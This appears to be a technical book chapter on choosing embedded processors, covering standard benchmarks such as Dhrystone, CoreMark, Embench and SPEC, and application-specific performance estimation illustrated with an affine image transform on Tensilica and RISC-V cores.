SPEC CPU . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 891
EEMBC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 892
Berkeley Design Technology . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 892
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 892
Using Application Code for Benchmarking . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 893
Estimation Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 893
Examples of Estimation Flow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 895
For Further Consideration . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 901
G. E. Martin
Pleasanton, CA, USA
S. Madhusudana · G. Efland · V. Kustov
Cadence Design Systems, Tensilica R&D, San Jose, CA, USA
Introduction
Design of electronic systems in the third decade of the twenty-first century almost
inevitably requires a design team to choose one or more embedded processors,
potentially of various kinds (CPU, DSP, GPU, specialized application processors),
as part of the design decomposition and functionality mapping (often known as
hardware-software codesign). The world offers a huge variety of choices to design
teams despite the consolidation among processor instruction set architectures (ISAs)
that has occurred over the past two decades. Teams may want to design a brand-new
processor with a brand-new ISA, although this has become less and less common.
Teams may be constrained to choose among existing processor implementations,
either at the full chip/system-on-chip (SOC) level with fully packaged processors,
or as intellectual property (IP) blocks already predetermined as a design constraint.
On the other hand, teams may be able to use configurable and extensible processor
technology to create derivatives of existing processor ISAs: they may choose coarse-
grained processor parameters or even add new application-oriented instructions to
the ISA to fit the design needs. For example, they may tune the sizes of caches and
local tightly coupled memories to ensure that a deeply embedded processor has just
enough memory for its applications, but no more. If their application emphasizes
floating point operations, they may turn on an IEEE 754 single-precision floating-
point ISA option. If they are using a preconfigured neural net acceleration processor,
they may have proprietary NN models which would benefit greatly in performance
and power by adding proprietary accelerating instructions using an architectural
description language (ADL).
Whether choosing among constrained existing alternatives or given more lati-
tude in choosing to design a brand-new processor or creating a derivative using
configurable technology, it is vital to take a data-driven approach to making
these design decisions. Characterizing design alternatives for the optimal fit to
the design requirements is a vital step. Where a great deal is known about the
intended application space, the best results are found when drawing from existing
or developing new application-oriented benchmarks. Where the application space is
so general purpose that it is unclear what the best measurement criteria are to use
for judgment, standard benchmarks may represent the only reasonable alternative,
although even there, the choice of which benchmark(s) to use is important. Many
benchmarks have been proposed and used for the last several decades, and they
have risen into and fallen out of favor. Even where application-oriented benchmarks
are available or newly written, it may be important to characterize the processor
choices using standard benchmarks because high performance on them, even if not
particularly relevant to the use cases, may be necessary for promoting the resulting
product to end design teams or to demonstrate some level of “future-proofing” by
showing high general purpose performance.
For existing designs, especially if implemented in packaged chips, running the
benchmarks may be relatively straightforward and design choices easy to justify. For
IP choices, especially with newly configured processor ISAs, use of various models
is necessary and their fidelity to the ultimate physical expression is an important
criterion in justifying such choices.
Having extracted a variety of benchmark data across the range of credible
processor choices, it is important that a design team have a defensible analysis
method to allow optimal choices to be made while considering the various aspects
of performance, power, and area (PPA), and execution speed estimates derived from
the models. Objective numerical criteria must be supplemented by more subjective
qualitative criteria to justify the choice ultimately made, and it is important to use
consensus weightings for the criteria to justify the decisions made.
The need to justify decisions rests partly on the tools used to measure perfor-
mance, including processor simulators, which exist at a wide variety of levels.
Chap. 26, “Methodologies for Design Space Exploration” by Andy Pimentel
outlines the importance of processor simulation in design space exploration and
summarizes several levels, including:
• RTL level
• Cycle-accurate instruction set simulation (ISS)
• ISS using binary translation (functional level, sometimes regarded as emulators)
• Host-compiled simulation where the functional ISS approach is combined with
the target application code
• Trace-based simulation as opposed to the previous execution-based approaches
• Sampled simulation
• Statistical simulation
(Figure: Processor characterization flow: analyze the application (data types, algorithms); simulate benchmarks on the chosen processor model(s); iterate.)

The overall flow starts with analysis of the application, in particular the data
types and algorithms which determine the performance of the applications. The next step is to choose
whether this design project will use existing processors or SoC devices with already
determined processor choices, or whether we could create new processors, probably
using a commercial or noncommercial extensible processor as a base.
Depending on the nature of the design project, we might choose processors using
standard benchmarks, or we may use application-oriented benchmarks, for which
we may need to develop the code ourselves. It is possible that we
may use a combination of both types of benchmarks. Measurements are derived
using appropriate models of the processor choices, of which there are several types
as discussed. The chapter will detail the several types of models that are possible.
Using the measurements, if the design project is using existing processors as
a design space, then a final choice is possible. If an extensible processor is being
used, then there is an interesting iterative loop in which the ISA may be extended
and the application performance is remeasured using updated models, which should
eventually terminate in a well-defined extended, configured processor which will be
used in the final design.
Finally, prior to the conclusion, we will illustrate several of these concepts
using examples of configurable and extensible processors with a wide variety of
application domains (audio, imaging and computer vision, communications, sensor
and signal processing, and AI/ML) as the basis for a discussion. A set of useful
references ends the chapter.
The starting point for performance characterization is always the intended applica-
tions. These may be existing or newly developed applications. Although we open
with data types rather than algorithms, in fact these are heavily interrelated. A high-
level algorithm may be chosen for the application, then the data type requirements
for accuracy and precision studied, and then the details of the algorithm fleshed out
to accommodate the data type characteristics.
Algorithms
Algorithms are closely linked to the data types and operations they use. In fact,
different algorithms may be necessary to best exploit the operations and data types
available to a given processor.
For example, consider implementing the affine transform on a two-dimensional
(2D) image (Wolberg 1990). A common approach is to interpolate the value of the
corresponding pixel in the input image for each position in the output image using
the inverse mapping. This can be done directly as a 2D interpolation or with a two-
pass approach of one-dimensional (1D) interpolations. The former can be efficient
on a vector processor when gather instructions are provided, while the latter 1D
approach may be more efficient when gather instructions either are not available or
have limited throughput.
Understanding the target applications and their requisite algorithms and data
types is key to the selection of the benchmarks used for processor performance
analysis. Existing benchmarks may be similar to or match the target but use different
algorithms or data types and thus not be representative of actual performance. If no
existing benchmark can be found, it may be necessary to create one.
Analysis of algorithm complexity is often useful to judge feasibility and guide
processor selection. Algorithm complexity can include types and numbers of
operations (e.g., number of 16-bit fixed-point multiply-accumulates (MACs)) and
memory sizes. This can also be used to evaluate benchmark results on a given
processor – for example, what utilization of the processor resources is achieved.
As an example, one can imagine a controller that positions a wide-angle camera
mounted on a car and communicates with the user, who operates the camera
via the controller. Once frames from the camera are captured and written to a
memory accessible by the controller, the captured raw frames may not be convenient
for viewing by a human observer, because the viewing position of the camera
undergoes high-speed changes as the car moves. Without some form of digital image
stabilization, the output video may look jerky and distorted.
$$\begin{pmatrix} x \\ y \\ z \end{pmatrix} = \begin{pmatrix} af_{11} & af_{12} & bf_{1} \\ af_{21} & af_{22} & bf_{2} \\ 0 & 0 & 1 \end{pmatrix} \begin{pmatrix} n \\ m \\ 1 \end{pmatrix}$$
Listing 1 sketches the implementation:

for (y = 0; y < H; y++) {
    for (x = 0; x < W; x++) {
        /* compute corresponding position in source image (xs, ys) */
        float xs = ar11*x + ar12*y + ar13;
        float ys = ar21*x + ar22*y + ar23;
        /* ... interpolate the four nearest source pixels ... */
    }
}
Here the inverse mapping is used to determine the corresponding position of each
output pixel in the input image. The value of the corresponding input pixel at this
position is interpolated, in this example using simple bilinear interpolation of the
four nearest neighboring pixel values.
This description uses floating-point values to represent the mapping parameters
and the corresponding input positions, and to perform the interpolation. While this
may be an appropriate choice for a processor with good support for floating-point
types and operations, it may be better to use fixed-point types on processors without
hardware floating-point support. In this case, one needs to determine the range and
precision requirements based on image sizes and interpolation quality to determine
the appropriate fixed-point formats.
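As a minimal sketch of such a format choice, assuming Q16.16 is selected (the type name and macros below are invented for this illustration):

#include <stdint.h>

typedef int32_t q16_16;                     /* 16 integer bits, 16 fraction bits */
#define TO_Q(f)   ((q16_16)((f) * 65536.0f))   /* convert float to Q16.16        */
#define Q_INT(q)  ((q) >> 16)                  /* integer part: pixel index      */
#define Q_FRAC(q) ((q) & 0xFFFF)               /* fraction: interpolation weight */

Sixteen integer bits cover source coordinates up to 65,535 pixels, while 16 fraction bits give interpolation weights far finer than bilinear quality requires; the range analysis described above might justify a narrower format on a particular processor.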
The complexity of the transform kernel includes several steps. The first step is
evaluation of the inverse mapping to compute the corresponding position in the
source image. As written, this requires four multiplications and four additions.
However, these positions can be incrementally calculated using simple additions
for each iteration of the nested loops. This reduces the complexity to two additions
in the inner loop and two in the outer loop.
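The incremental form can be sketched as follows (a hypothetical restructuring of Listing 1, reusing its coefficient names):

/* Moving one pixel in x adds (ar11, ar21) to the source position;
   moving one row in y adds (ar12, ar22). No per-pixel multiplies remain. */
float row_xs = ar13, row_ys = ar23;        /* source position of pixel (0, 0) */
for (int y = 0; y < H; y++) {
    float xs = row_xs, ys = row_ys;
    for (int x = 0; x < W; x++) {
        /* ... interpolate source pixel at (xs, ys) ... */
        xs += ar11; ys += ar21;            /* two additions in the inner loop */
    }
    row_xs += ar12; row_ys += ar22;        /* two additions in the outer loop */
}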
The next step is to compute the positions of the nearest neighbors and read
them from the source image. This includes two operations to separate the positions
into integer and fractional components. Reading the source image values requires
additions of a constant – often this can be done with an addressing mode.
The final step is to interpolate the value given the values of the four neighbors and
write the result to the destination image. As written, the interpolation requires three
multiplications and six additions. Note, however, the difference input to each of the
multiplications requires a larger range to represent than the individual pixel values
and may be problematic; an alternative is to use two separate multiplications for
each instead. Some processors may provide fused difference-multiply instructions
or even full interpolation instructions to optimize handling of such cases.
Algorithm complexity analysis is useful for estimating the first-order computa-
tion requirements of an application as a guide for initial processor selection and
evaluation. The specifics of a processor will be considered in subsequent analysis
and benchmarking.
In a nutshell, there are four prominent use cases that are important in choosing
processors.
Existing Processor
The first use case is choosing existing and stable processors, possibly as packaged
parts (or portions of packaged SoCs) to be used for an application. For example, Mediatek
and Qualcomm both offer packaged chips which include application processors for
mobile devices. Both use variants of Arm cores and are available in multiprocessor
configurations (Mediatek 2020, Qualcomm 2020). For a mobile device design, an
OEM may wish to choose the provider of their application processor SoC and
then choose which among their various offerings is the best combination of price,
performance, future capacity, power consumption, and ease of programming, for
example. While performance is not the only criterion to use, it is certainly an
important one and thus characterizing the variety of application processors on offer
to help find the best match to the mobile product requirements is an essential use
case.
It is also quite possible that a design team is planning to develop their own SoC
but will want to choose one of several preconfigured instruction set processors avail-
able as intellectual property from different vendors (e.g., Arm, Cadence-Tensilica,
Ceva, Synopsys-ARC), without wanting to make any particular extensions, and may
make modest configuration choices such as memory sizes. In this case, they can
be regarded in almost the same way as prepackaged, pre-built SoCs, albeit with
slightly more variation possible in configuring some of the design characteristics.
Again, a choice must be made among vendors and then among the possible configurations
available from the chosen vendor, and various characteristics will be important, of
which performance is only one.
The option of designing a new processor, with a new instruction set architecture
(ISA), has declined in favor over time. This is due to the high costs of developing
a processor design and implementation from scratch, verifying it, and developing
and supporting the complete software (SW) toolchain for it – (compiler, assembler,
disassembler, debugger, IDE, instruction set simulator(s)). However, there are
commercial ADL-based toolsets that make this option easier: for example, Synopsys
ASIP Designer, based on the nML ADL (Synopsys 2021); and Codasip’s Codasip
Studio, using the CodAL ADL (Codasip 2021).
However, over the last several years, new options have arisen that reflect a hybrid
between a brand-new ISA and choosing only existing processor implementations.
RISC-V, for example, (RISC-V 2020) allows a design team to pick a well-defined
base ISA with some well-defined configurable additions (growing over time) and
then extend it further with proprietary custom ISA extensions, while still benefiting
from third-party, often open-source, SW tooling. In addition, there are a variety of third party,
often open source, but also commercial, IP offerings in the RISC-V domain (RISC-
V Exchange 2020), which can be used as-is, configured and extended by the end
user group, or by a commercial supplier, thus offering a credible hybrid model for
design groups interested in this approach.
Standard Benchmarks
Before going into detail on the available standard benchmarks and their use cases,
we will discuss generally how to estimate and measure processor performance as an
aid to making processor selection, and the general issues with estimating processor
performance. This is used to motivate the use of standard benchmarks, and we
describe several used historically and more recently. In many cases, the standard
benchmark numbers may be sufficient for making processor choices; in other cases,
moving to application-specific benchmarks may be needed to make the right choice.
This is the topic for the next section.
About two decades ago, it was common for processor vendors to advertise the
performance of their products by stating how many instructions per second the
processor could execute. Some customers, especially start-up companies, based
their choice of the processor on this criterion alone, only to find later that processors
capable of executing fewer instructions per second (commonly measured in millions
of instructions per second or MIPS) outperformed processors capable of more MIPS
on their tasks. Nowadays, MIPS is still looked upon as the first step in evaluating
processor choice or design, but MIPS is almost never used as a single performance
measure, because it does not distinguish between the types of instructions and
architectures of the processors.
To illustrate the problem, let us consider a task of subtracting two images. This
task is common in video compression (such as MPEG-2, H.264, H.265) where a
motion-compensated picture is subtracted from the original uncompressed picture
to form a residual signal, which is then quantized and encoded. If the pictures are
more than 8 bits per pixel, and processor A has an ISA that only has an 8-bit subtract
instruction, processor B has a 32-bit subtract instruction, and processor C has an
instruction that performs multiple 32-bit subtractions in one cycle, it will take the
smallest number of instructions to subtract the pictures using processor C, more
instructions on processor B, and the highest number of instructions on processor A.
Processor A may be capable of the highest number of MIPS (for example because
it can operate at a higher frequency), while processor C will perform the task of
subtracting images faster because it will need to execute fewer instructions.
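For reference, the kernel under discussion is nothing more than the following loop (a sketch with invented names; pixels are taken as 16 bits to exceed the 8-bit case):

#include <stdint.h>

/* One subtract per pixel on processor B; processor C retires several of
   these subtractions per instruction, processor A needs several per pixel. */
void subtract_images(const int16_t *cur, const int16_t *pred,
                     int16_t *residual, int num_pixels) {
    for (int i = 0; i < num_pixels; i++)
        residual[i] = cur[i] - pred[i];
}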
Often processor vendors characterize the performance not in instructions per
second but operations per second. This metric will consider processor C’s capability
of performing multiple operations within a single instruction, and multiply the
number of operations in the instruction by the number of instructions per second
(typically measured in giga- or tera-operations per second: GOPS or TOPS). This
metric gives a better insight into the processor’s resources, but still falls short of
predicting performance on a specific task, since it is a measure of computational
resources, not of architectural fit. As an example, one can imagine two machines
both capable of one GOPS: the first executes 1000 MIPS of single-operation
instructions, while the other executes 100 MIPS where each instruction is a 10-way
single instruction multiple data (SIMD) operation. If the architectures of the two
machines are otherwise similar, they will have similar performance in subtracting
two images. However,
given an algorithm with high data dependencies, such as entropy coding, it will be
difficult to schedule 10 operations in parallel, and the computational resources of
the SIMD machine will be underutilized giving the machine with a single operation
per instruction running at a higher frequency a performance advantage.
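The contrast is visible directly in code. Unlike the image subtraction above, an entropy-coder-like loop carries its state across iterations; a schematic sketch follows (the update function is a stand-in, not a real coder):

#include <stdint.h>

uint32_t encode_symbol(uint32_t state, uint8_t sym);  /* stand-in coder step */

/* Iteration i cannot begin until iteration i-1 has produced 'state',
   so the 10 SIMD lanes of the second machine cannot be filled. */
uint32_t encode_all(const uint8_t *syms, int n, uint32_t state) {
    for (int i = 0; i < n; i++)
        state = encode_symbol(state, syms[i]);
    return state;
}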
Modern applications, such as video compression, robotic vision, audio com-
pression, graphics, and neural networks, in their entirety are far more complicated
than subtracting two images or entropy coding. Choosing the right architecture for
specific applications is an extremely important task. Even if a processor meets the
computational budget for the task, it can also be overkill, resulting in idle
resources and increased power consumption, area, and cost.
Several decades ago, professionals developing processor hardware as well as
software architects who used the processors started to look at a unified way to
characterize performance of processors, searching for applications (benchmarks)
which would better predict processor performance for a wide variety of tasks than
MIPS or GOPs.
Let us look at some C language code snippets that highlight the problem. The
first example is a common procedure of linked-list parsing. We will look at the
inner loop, where most implementations spend most of the processor time.
struct Node {
    void *data;
    struct Node *next;
};

struct Node *node;
Instantiate_and_initialise_Node_struct(node);
/* inner loop: walk the list */
while (node != NULL)
    node = node->next;

The second example blends two images using a constant weight alpha:

for (h = 0; h < height; h++)
    for (w = 0; w < width; w++)
        output_image[h][w] = image1[h][w]*alpha +
                             (1-alpha)*image2[h][w];

The list traversal is inherently serial, since each iteration depends on the pointer
loaded in the previous one, whereas every pixel of the blend can be computed
independently; the two snippets therefore stress very different architectural
capabilities.
Whetstone
The first version of Whetstone (Curnow and Wichmann 1976) was developed in
1972 and in its modified form is still used today. In its current form, it is a small
amount of synthetic code which contains loops, function calls, fixed- and floating-
point computations. In this context, “synthetic” means it does not implement
algorithms or applications but contains artificial code. Although Whetstone attempts
to include different types of computation and memory accesses as a “universal”
benchmark would do, the benchmark is heavily weighted by mathematical com-
putation using floating point, and branches. To achieve a good performance on
Whetstone, the processor must have double-precision floating-point operations in
its instruction set. A good branch predictor and branch resolution architecture will
help achieve higher performance on Whetstone. For general purpose application
processors, which are intended to run many different programs, fetch large amounts
of instructions (Whetstone’s code is small and can fit into a modern level-one
instruction cache), and perform frequent context switching, performance on
the Whetstone benchmark does not correlate well with real-world performance.
However, if the intended applications are floating-point DSP-type applications,
Whetstone is useful at an early stage of selecting a processor, although it is so
outmoded as of 2020 that its use is rarely reported.
Linpack

The Linpack benchmark, derived from the LINPACK linear algebra library, measures
floating-point performance by solving a dense system of linear equations, with
results reported in floating-point operations per second (FLOPS). Its highly
regular, multiply-accumulate-dominated computation rewards floating-point
throughput and memory bandwidth rather than control-oriented code; a derivative,
HPL, is still used to rank the TOP500 supercomputers.
Dhrystone
The first version of Dhrystone was developed in 1984 (version 1.1). Just like
Whetstone, this is a synthetic benchmark and does not represent any real-world
application. Just like Whetstone, the code contains loops, branches, function calls,
and fixed-point computations, but no floating-point computations. Dhrystone was
designed to better represent execution patterns and types of computation encoun-
tered in general purpose processors. There are several drawbacks to Dhrystone:
(a) The outputs of some functions are not used, so compilers remove those functions
as dead code during optimization and they are never executed at all, which
works against the intention of the Dhrystone benchmark, giving extremely good
but incorrect Dhrystone scores.
(b) Dhrystone contains too much string-manipulation code, so the score is heavily
weighted by the ability to manipulate strings. String manipulation correlates
poorly with the types of computations and memory accesses on which general
purpose computers, DSPs, and controllers spend most of their time today.
(c) Dhrystone’s use of libraries makes it heavily dependent on library opti-
mizations, and therefore more dependent on the compiler which skews the
benchmarking of the underlying processor hardware.
(d) Just like Whetstone, Dhrystone is a small program and can fit completely into
the instruction caches of modern processors. Therefore, Dhrystone does not
characterize well the instruction caching subsystem, the effect of the system bus,
or external memory bandwidth and latency.
Subsequent versions of Dhrystone (2.0 and 2.1) attempted to modify the code
to prevent dead code elimination by the compiler. The effort, however, was only
partially successful. To obtain a meaningful score, one must disable dead code
elimination, typically through compiler optimization flags.
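One common workaround, sketched here with an invented benchmark body rather than actual Dhrystone code, is to route results through a volatile variable so the compiler must keep the computation even at high optimization levels:

int compute(int i);               /* hypothetical benchmark workload */
volatile int sink;                /* compiler cannot prove writes are unused */

void timed_loop(int n) {
    int acc = 0;
    for (int i = 0; i < n; i++)
        acc += compute(i);        /* work the optimizer may not discard */
    sink = acc;                   /* observable side effect keeps the loop */
}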
In 2020, Dhrystone is still used as a measure of performance primarily in
controller-type processors, although even for these types of applications, there are
better and newer benchmarks. For the past two decades, the consensus has been
that Dhrystone is on its way out and that, within a few years, it would become
uncommon to ask for or provide Dhrystone scores. Nonetheless, as of 2020,
Dhrystone is still often used. For more information, see Weiss (2002).
CoreMark
CoreMark, released by EEMBC in 2009 as an intended successor to Dhrystone, does
not contain string manipulations. In fact, it does not make
library calls within the timed part of the code. This makes it independent of library
optimizations and makes it more of a hardware benchmark than a library benchmark.
Like Dhrystone, it is a synthetic benchmark which does not include floating-point
computations. It contains integer arithmetic, matrix manipulations, linked-list pars-
ing, state machines, data-dependent conditional branches, and CRC computations.
Like Whetstone and Dhrystone, the instruction size and data size are also small
on most target processors, so this benchmark could fit completely into instruction
caches or data caches of modern processors. As far as instruction cache is concerned,
the situation here is somewhat “worse” than that of Whetstone and Dhrystone. This
is because without library calls, the amount of code which gets cached is less than
that of Whetstone and Dhrystone where library code gets cached as well.
Therefore, like Dhrystone and Whetstone, it is not useful for the characterization
of the caching subsystem, the effect of the system bus, and external memories’
bandwidths and latencies.
CoreMark is a good benchmark for general purpose and controller types of
processors. For digital signal processing, it is not an adequate benchmark, because
it does not perform mathematical operations such as multiply-accumulate, repre-
sentative of such processing, nor does it contain a sufficient amount of independent
data and operations which can be exploited through parallel data and instruction
processing (VLIW and/or SIMD). Its lack of floating point makes it unsuitable for
processors which emphasize floating point capabilities.
Overall, CoreMark is a big improvement for estimating the performance of
embedded controllers, and it has gained enough traction to be considered the
successor of Dhrystone. However, processor vendors and their customers may
still want Dhrystone numbers, usually in addition to, rather than instead of,
CoreMark. EEMBC has released a cost-free version of CoreMark on GitHub
(Coremark Github 2020).
Embench
Rounding out the short list of the most common no-cost benchmarks is Embench.
Unlike the previously discussed benchmarks, Embench is not a single benchmark but
a suite of different benchmarks. It is still under development as of the time of this
writing in late 2020. In fact, Embench’s philosophy is to adapt to new situations
and to benchmark new architectures over time as the need arises (Embench 2020;
Patterson 2020). To quote from its website as to its purpose:
Dhrystone and Coremark have been the de facto standard microcontroller benchmark suites
for the last thirty years, but these benchmarks no longer reflect the needs of modern
embedded systems. Embench™ was explicitly designed to meet the requirements of
modern connected embedded systems. The benchmarks are relevant, portable, and well
implemented.
Unlike Whetstone, Dhrystone, and CoreMark, Embench comprises real application
programs (not synthetic code). The applications are selected to cover three axes of
processor architecture (computational power, memory accesses, and branches) and
implement diverse algorithms. To illustrate the diversity of the applications in the Embench
suite, it is sufficient to name some: 32-bit CRC checking, cubic root solver, Huffman
encoding and decoding, dot product, FIR, IIR, DCT, codebook search, integer
matrix multiplication, matrix inversion, N-body problem calculations, Regex, mean,
standard deviation, correlation, etc. Embench uses fixed-point, single-precision
floating-point as well as double-precision floating-point computations. The original
code for the individual applications comprising the suite was not written specifically
for Embench; it comes from various sources, including earlier benchmarks, but the
curated selection of applications is what gives Embench good prospects for wide
adoption.
Finally, it is worth mentioning the use of Embench for estimating caching and
external-memory access performance. Despite the many applications comprising
Embench, the total code size is small; moreover, the applications warm up the
caches before the timed portion of the code by design, so the suite is not designed
to stress the caching system.
SPEC CPU
SPEC CPU (SPEC CPU 2020) stands out among the benchmarks discussed here by
its code size. SPEC has large data and code, which are unlikely to fit into Level One
(L-1) cache. It would therefore be more likely affected than the other benchmarks by
the performance of the caching system and bus and external memory characteristics.
This is a commercial benchmark suite, and there is a cost associated with
obtaining the benchmarks. SPEC is a suite of applications which consists of non-
synthetic code. The first version of SPEC CPU was made available in 1989 and
consisted of 10 programs. The current version, SPEC CPU 2017, has 43 benchmarks
organized into four suites: SPECspeed 2017 Integer, SPECspeed 2017 Floating
Point, SPECrate 2017 Integer, and SPECrate 2017 Floating Point. The SPECrate
suites measure throughput by running multiple concurrent copies, while the
SPECspeed suites measure the time to run single copies. A single copy of
SPECspeed can also benefit from multiple threads and cores through OpenMP;
however, if the compiler does not support OpenMP, it must be capable of
auto-parallelization.
The benchmarks are distributed as source code. To compile all of them, one needs
C99, C++2003, and Fortran-2003 compilers. This may pose a challenge when
trying to benchmark embedded or soft cores from smaller processor vendors without
a large software ecosystem.
EEMBC

The Embedded Microprocessor Benchmark Consortium (EEMBC) develops suites of
application-oriented benchmarks organized by embedded domain, including automotive,
networking, telecom, and digital imaging, as well as more recent suites for
ultra-low-power and machine-learning workloads. Because each suite targets a
specific application area, EEMBC results are often a better predictor of embedded
performance than the general purpose synthetic benchmarks discussed above;
CoreMark, described earlier, is also an EEMBC product.
Summary
In the previous sections, we looked at the amount of resources available on the
processor and at the use of common standard benchmarks to predict processor
performance. The goal was to describe methods for estimating processor performance
on a variety of tasks and thus to aid in selecting the right processor or architecture.
Application-Specific Benchmarks

In this section, we will look at the problem of estimating processor performance
when the applications for which the processor will spend most of its time are known.
In this scenario, the performance of the candidate processor on common standard
benchmarks of the previous section is less relevant: our goal is to perform a
particular known algorithm on a frame in less than a certain amount of time within
a given power budget (and most likely an area budget as well, if this is a chip-level
design using a soft-core processor).
Estimation Analysis
As far as the architectural fit and speed of the processor is concerned, the selection
of the processor can take place at different levels: selecting a processor based on its
fixed architecture, selecting appropriate extension packages to the processor base
ISA, and introducing user-defined individual instructions or operations.
Selecting the processor based on its fixed architecture is the coarsest way of
obtaining architectural fit and is frequently carried out by balancing the amount of
available computational resources and bandwidth against the amount required by the
algorithm. For example, if the algorithm is MAC limited and requires executing 500
million MACs per second, the processor must be capable of executing at least 500
million MACs per second.
At the next level, where the designer extends the processor with a custom ISA
package, a more detailed analysis of the algorithm must be carried out to identify
frequent computational and memory access patterns and to match them against
the ISA of an extension package.
Let us continue with the example of the affine transform from section “Example:
Affine Transform of 2-D Image.” The goal is to sustain a transform of height (H) by
width (W) image pixels (for the sake of this example, assume a grayscale image) at a
rate of R frames per second. Looking at a standard benchmark, such as a CoreMark
score, does not tell us whether we will sustain the transform for this image size and
frame rate. Moreover, although we may sustain the needed throughput, the power
consumption and area of the core may be an overkill for the job.
As the first step, we need to establish the required computational resource:
H × W × R × Cp, where Cp is the number of required computations per pixel.
Computations per pixel is not a universal metric; it raises the question of which
computations are counted and how they map onto the ISA. Is a multiply-accumulate
one operation, or two operations (multiply and add)?
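For instance, with hypothetical numbers (a 1920 × 1080 grayscale stream at R = 30 frames per second and Cp = 10), the requirement is

$$1920 \times 1080 \times 30 \times 10 \approx 6.2 \times 10^{8}\ \text{operations per second}.$$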
The next question is: are we limited by data dependencies? Even if the number
of required computations per pixel is below what the processor can supply per
pixel, computations that depend on one another cannot be carried out in parallel.
The next question relates to memory bandwidth. In some cases, the processor
can be designed (such as an extension for neural networks) to be capable of many
MACs per load, relying on the fact that weights or data are reused and multiple
operations are performed on data or weights between reading them from memory
and writing the results back to memory. If a high MAC to bandwidth architecture
is used to implement affine transforms, the computational blocks could quickly be
starved waiting for data to come from memory and then stalled waiting for data to
be written to memory.
The question of bandwidth is not just limited to the maximum bandwidth
available between the core and the memory subsystem but also to the actual
bandwidth limited by the access pattern of the algorithm. The affine transform is a
good example where data is not loaded or stored in aligned contiguous patterns. For
example, if we can load N bytes of aligned contiguous data from memory, this does
not mean that such a performance can be achieved if N bytes are at noncontiguous
addresses in memory. If a simple memory management subsystem and ISA are used,
the data needs to be loaded using the N-byte word it is contained within. Therefore,
if each byte of data belongs to a different N-byte word, to load N bytes of data, we
need N separate N-byte-word loads instead of just one. This might not be a big
problem for narrow machines where N is small (for example, 1, 2, or 4 bytes), but it
becomes extremely inefficient for wider machines, for example with N = 64, 128,
or more bytes.
If the memory subsystem involves caches, as opposed to tightly coupled memory
and direct memory access engine transfers, the analysis becomes much more
complicated.
Continuing with the example of the affine transform, our design-oriented
approach can be broken into the following steps: establish the required
computational resources, check for limiting data dependencies, analyze memory
bandwidth and access patterns, and iterate over candidate processor configurations.
Let us consider examples of evaluating RISC-V cores and soft cores from Cadence
Tensilica for implementing the affine transform. There are also soft cores such
as those from Arm, ARC, CEVA, and MIPS which may be considered, but we
limit ourselves to two to get the main points across. Tensilica is representative
of commercial extensible processor architectures; it has a mature set of tools for
customizing cores as well as creating different purpose DSP ISAs. RISC-V is an
open-source standard, which has several extensions either ratified or in definition for
accelerating different algorithms, and many cores available from academic research
projects, open-source consortia, and commercial suppliers.
Hardware Aspects
We first consider a configurable, extensible processor as a candidate for implement-
ing the affine transform on the video feed described above (Fig. 2).
We begin with the base processor core, a 32-bit scalar machine executing one
32-bit instruction at a time. If we want a faster floating-point implementation,
we need to select a floating-point coprocessor as well. Then we compare the
number of operations per second required by the implementation of section
“Algorithms” against the capability of the base core.
If the base core cannot sustain such a load, we can design custom instructions to
accelerate the implementation or consider extended DSP cores. Beyond the base
Cadence-Tensilica core are families of various application-oriented DSPs including
a Vision DSP family. In the Vision family, there are two predefined vision DSPs
which give a good architectural fit to this application space. Looking further into the
vision DSP family for a resource match, we find that DSP two (Vision Q7) has twice
the number of MACs as DSP one (Vision P6), and can run at a higher frequency than
DSP one.
Further, if the DSP two ISA lacks the required performance, we could consider
adding further custom instructions to accelerate our transform. The DSP two ISA
is not specifically optimized for affine transforms; rather, the ISA is optimized
for a blend of video and image processing algorithms and should provide good
performance for affine transform of an image. The computational part of its
architecture includes the capability of executing up to five SIMD operations in a
single VLIW instruction bundle. Each of the five SIMD operations can operate on
512-bit wide inputs, i.e., 64 operations on 8-bit data, 32 operations on 16-bit data
(Fig. 2: Decision flow for the configurable, extensible processor: base core or extension? predefined Vision DSP? DSP one or two? custom instructions?)
(Figure: The corresponding decision flow for a RISC-V core: base ISA or vector extension? vector parameters? custom instructions?)
Software Aspects
Now that we have looked at the hardware aspects of implementing the affine
transform, let us look at some of the software aspects.
Section “Example: Affine Transform of 2-D Image” contains an example of an
implementation with pseudo-code (Listing 1). That implementation assumes one
32-bit floating-point operation is performed at a time and the number of operations
is expressed as the number of 32-bit floating-point operations.
Analyzing the algorithm, we see that the computations for every pixel are indepen-
dent of each other and can be performed in parallel. We can load multiple pixels,
perform multiplications and additions on the loaded pixels in parallel, and store
the results in parallel.
For example, the computations

vxs = a11*vx + a12*vy + a13;
vys = a21*vx + a22*vy + a23;

are independent, where vxs, vys, vx, and vy are vector or SIMD variables, each
containing 16 32-bit single-precision floating-point numbers. Vision DSP two
provides a 16-way 32-bit floating-point type as well as two 16-way 32-bit
floating-point MACs and adders, so the original line of code can be accelerated
up to 32 times.
Loading these pixels in parallel could be tricky. Naturally every processor can
load and store pixels which are contiguous and aligned to the word. If the image is
aligned on the word boundary of the processor and the image width is a multiple
of the word width, every load brings the maximum possible number of pixels. For
example, for a 512-bit load, the load operation loads 64 8-bit pixels onto a register
or 16 32-bit single-precision floating-point numbers. To load multiple bytes or small
words from pseudo-random addresses, many wide machines, including DSP one
and two, provide operations designed to do this efficiently. Such operations, found
in many DSPs, are called gathers (for loads) and scatters (for
stores). The RISC-V vector extension specifies such operations as well. These are
loads and stores with the vector-indexed addressing mode.
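Whatever the ISA spelling, the semantics of gather and scatter can be stated in a few lines of scalar reference C (names invented for illustration); the point of the hardware instruction is that all n element accesses form a single operation:

/* Gather: element addresses need not be contiguous or aligned to the
   vector width. */
void gather_f32(float *dst, const float *base, const int *index, int n) {
    for (int i = 0; i < n; i++)
        dst[i] = base[index[i]];
}

/* Scatter: the store-side counterpart. */
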